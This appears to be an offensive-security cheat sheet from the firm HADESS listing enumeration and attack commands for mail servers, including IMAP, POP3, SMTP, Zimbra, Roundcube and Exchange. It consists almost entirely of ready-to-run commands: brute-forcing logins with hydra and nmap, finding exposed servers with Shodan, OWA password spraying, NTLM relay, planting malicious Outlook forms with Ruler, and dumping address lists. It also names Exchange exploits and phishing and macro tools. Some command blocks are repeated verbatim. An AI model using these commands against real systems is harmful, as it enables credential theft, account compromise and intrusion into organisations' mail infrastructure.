A cheat sheet that contains common enumeration and attack methods for mail servers.
Brought to you by:
HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.
nmap [-sS] [-sC] -Pn -p 143,993 -sV --script=banner [IP]
nc -nv <IP> 993 [IP]
shodan search "port:143"
telnet example.com 143
a1 AUTHENTICATE NTLM
nmap --script=imap-ntlm-info [IP]
hydra -l USERNAME -P passwords.txt -f [IP] imap -V
hydra -S -v -l USERNAME -P passwords.txt -s 993 -f [IP] imap -V
nmap -sV --script imap-brute -p [PORT] [IP]
nmap [-sS] [-sC] -Pn -p 110,995 -sV --script=banner [IP]
nc -nv <IP> 110 [IP]
shodan search "port:995"
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p [PORT] [IP]
a1 AUTHENTICATE NTLM
nmap -p110 --script pop3-brute <target>
hydra -l muts -P pass.txt [IP] pop3
nmap [-sS] [-sC] -Pn -p 25,465,587 -sV --script=banner or --script smtp-commands [IP]
nc -nv <IP> 25 [IP]
nc -nv <IP> 465 [IP]
nc -nv <IP> 587 [IP]
shodan search "port:25"
shodan search "port:465"
shodan search "port:587"
telnet example.com 587
HELO
AUTH NTLM 334
a1 AUTHENTICATE NTLM
nmap -p[25,465,587] --script smtp-brute <target>
hydra -l muts -P pass.txt [IP] smtp
emkei.cz
telnet [IP] [25 or 465 or 587]
MAIL FROM: sender@adress.ext
RCPT TO: recipient@adress.ext
SUBJECT: Test message
.
shodan search "8.8.6_GA_1906"
shodan search "zimbra"
modules/auxiliary/gather/memcached_extractor
evilmacro
macropack
...
LDAPPER.py -D EVIL -U 'Administrator' -P 'password' -S DC02.EVIL.DEV '(msExchDeviceID=123456)'
peas -u 'EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc '\\DC01\'
gophish
CVE-2022-37042
CVE-2022-37041
CVE-2022-37044
POST
shodan search "http.title:'Roundcube Webmail :: Welcome to Roundcube Webmail'"
shodan search "http.favicon.hash:976235259"
evilmacro
macropack
...
LDAPPER.py -D EVIL -U 'Administrator' -P 'password' -S DC02.EVIL.DEV '(msExchDeviceID=123456)'
peas -u 'EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc '\\DC01\'
gophish
2021-44026
POST
shodan search "'X-AspNet-Version http.title:'Outlook' –'x-owa-version'"
shodan search "http.favicon.hash:44274939"
shodan search "http.title:outlook exchange"
autodiscover/autodiscover.xml
ProxyLogon(2021-26855)
ProxyShell(2021-34473)
HAFNIUM(2021-26858)
Invoke-PasswordSprayOWA
Invoke-PasswordSprayEWS
nmap --script http-ntlm-info
responder
./exchangeRelayx.py -t https://mail.evil.com
Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password password -OutFile global-address-list.txt
Bloodhound
net GUI
Ruler
./ruler --email user@evil.dev form add --suffix superduper --input command.txt --send
evilmacro
macropack
...
LDAPPER.py -D EVIL -U 'Administrator' -P 'password' -S DC02.EVIL.DEV '(msExchDeviceID=123456)'
peas -u 'EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc '\\DC01\'
peas -u 'EVIL.DEC\user' -p 'password' exch01.evil.dev --smb-user='EVIL\sharepoint-setup' --smb-pass='password' --list-unc 'http://SHP01/share'
nmap mail.evil.dev -p 6001 -sV -sC
rpcmap.py -debug -auth-transport 'EVIL/user:password' 'ncacn_http:[6001,RpcProxy=mail.evil.dev:443]'
rpcmap.py -debug -auth-transport 'EVIL/user:password' -auth-rpc 'EVIL/mia:password' -auth-level 6 -brute-opnums 'ncacn_http:[6001,RpcProxy=mail.evil.dev:443]'
LDAPPER.py -D EVIL -U 'Administrator' -P 'password' -S DC01.EVIL.DEV '(mail=user@evil.dev)' mail objectGUID legacyExchangeDN distinguishedName
exchanger.py EVIL/user:'password'@mail.evil.dev nspi dump-tables -name Hackers -lookup-type EXTENDED
gophish
